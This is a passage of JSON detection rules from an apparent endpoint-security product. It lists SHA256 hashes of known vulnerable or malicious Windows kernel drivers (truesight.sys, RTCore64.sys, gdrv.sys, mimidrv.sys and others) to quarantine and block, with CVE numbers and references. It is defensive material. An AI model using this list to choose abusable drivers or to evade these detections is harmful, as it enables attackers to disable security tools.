+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c5c3af-43d1-5142-9305-0ade01ddc6cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142326Z",
+ "creation_date": "2026-03-23T11:45:31.142328Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4f334bccb62825eeead6a3062b7425afe50b674207f88d6fbd4aef8e5510365",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c77c29-ea52-5537-849a-83edbe7a162c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615135Z",
+ "creation_date": "2026-03-23T11:45:29.615137Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615142Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2a4ddcc9c3b339d752c48925d62fc4cc5adbf6fae8fedef74cdd47e88da01f8",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c7a7b8-d0a3-5325-8796-0d39ce115cc6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613648Z",
+ "creation_date": "2026-03-23T11:45:29.613651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7aaf2aa194b936e48bc90f01ee854768c8383c0be50cfb41b346666aec0cf853",
+ "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) [https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c7ce45-ec56-58b8-87a7-5b6c7e74f13c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607328Z",
+ "creation_date": "2026-03-23T11:45:29.607330Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607336Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b61869b7945be062630f1dd4bae919aecee8927f7e1bc3954a21ff763f4c0867",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81d7798e-d940-52ea-a377-a9db19240d83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472666Z",
+ "creation_date": "2026-03-23T11:45:31.472670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472679Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42392416a73b17679bf2e75083f6b7cf216eebcb63a2c10192041d630d783fe8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81e24cdd-be88-5359-9047-4865188375f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463784Z",
+ "creation_date": "2026-03-23T11:45:30.463787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463795Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b30b2dc36d5e8f1ffc7281352923773fb821cdf66eb6516f82c697a524b599b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81e40760-4443-526f-8e1d-2eee594ccb7d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820048Z",
+ "creation_date": "2026-03-23T11:45:30.820050Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820055Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "221369498ae77e0ff60ce2f59de6ef2bbb01aca8cd55d7a8487760068f5a544a",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81e97c58-d1ab-5ad8-94ee-a4a1d04159b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609557Z",
+ "creation_date": "2026-03-23T11:45:29.609559Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1251eef40b877fd379c175c02bb83e230fa5acd30020e54acc0718ab326818b3",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81f6dccc-f833-50d1-a017-1bc8760f609e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619089Z",
+ "creation_date": "2026-03-23T11:45:29.619091Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5a6fe0d0a3894f55b7ba9b4d5a03022f6146544f1f874ae1ef32c29450535b7",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82009fe8-8ce7-5f62-8540-f4fe4b9614c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480397Z",
+ "creation_date": "2026-03-23T11:45:31.480400Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480410Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e032410a55db0311918bdf411fe403b745c02a6112d4ac9dc8689d1ae6dc7dd2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8209f5d8-4d19-5721-b7b5-b3459c3c36f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824367Z",
+ "creation_date": "2026-03-23T11:45:30.824369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824375Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "416e71a3fd5f8d20caea3661d95b48a70cab35650fa7fc9db59ceeff80a324da",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "820ee5ee-a888-5a77-b1e7-ac901d894562",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980837Z",
+ "creation_date": "2026-03-23T11:45:29.980839Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980845Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b120de80a5462f8395cfb7153c86dfd44f29f0776ea156ec4a34fa64e5c4797",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82132cd3-b01f-5ebe-b044-89105206d9ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981147Z",
+ "creation_date": "2026-03-23T11:45:29.981149Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c830ed39c9de8fe711632bf44846615f84b10db383f47b7d7c9db29a2bd829a",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "821a7c74-445d-5d22-b6a7-b4bec318d4d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144390Z",
+ "creation_date": "2026-03-23T11:45:32.144392Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144398Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e6b039e10d2b93fbce625ecb7bf04b38eac69b96385fc3b28541c8da78fd8ad",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "821b5805-f6c2-5f9b-8f73-a7bddf3102f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143114Z",
+ "creation_date": "2026-03-23T11:45:32.143116Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143121Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ada2b855757c9062231f5ed4e80365b8d8094e9adbce8f26d1ff5ea0b7a70c77",
+ "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "821bb7bc-006c-55e6-9257-cebf8d3770d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490401Z",
+ "creation_date": "2026-03-23T11:45:31.490403Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490409Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fafa5175851027e63ca29722169b363f0558426ea7a58640578c3e6d2e3407a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8232b798-0edd-555f-a8e0-fbdfc96bf56a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833616Z",
+ "creation_date": "2026-03-23T11:45:30.833619Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833628Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2846aeae7f34281c69a7f6183797768f4418a8fc76119800d5f15d47bcdb85ec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "823655e8-9929-50fb-97fa-f5d8c9532ef8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147734Z",
+ "creation_date": "2026-03-23T11:45:31.147736Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147741Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7055b8634a17d0a88825995b91cfebf00d177add33c1d1d5d2de77b000128d5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "823b12d0-a926-59c3-9229-bb7e5c0f6a09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146402Z",
+ "creation_date": "2026-03-23T11:45:31.146404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146409Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74edf2e45870d507c804ec269419b327cf2bbff82dd9330dfc91ebc84192f521",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "823b1426-bd3d-5db3-93ea-b9006a2bf178",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971714Z",
+ "creation_date": "2026-03-23T11:45:29.971716Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "082adcdc2d246d2291bcf135a7519840a84f27cfa3143d1372a9e2aa5e514dbd",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "825c2dbe-c2a3-54cb-ba17-2912988484af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969906Z",
+ "creation_date": "2026-03-23T11:45:29.969908Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969914Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b38427f167fde644868a62f0aa1ed03790137905c97024ac21729fa6153eca2",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "825c9d7d-51f7-5863-b60d-52e6654c926d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493967Z",
+ "creation_date": "2026-03-23T11:45:31.493971Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493979Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b023404cb64ca532643fa25c600890f00fbfe3449ce1d0f103492318febfce27",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "825d584e-3027-5d05-8aca-a26f78c71a3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
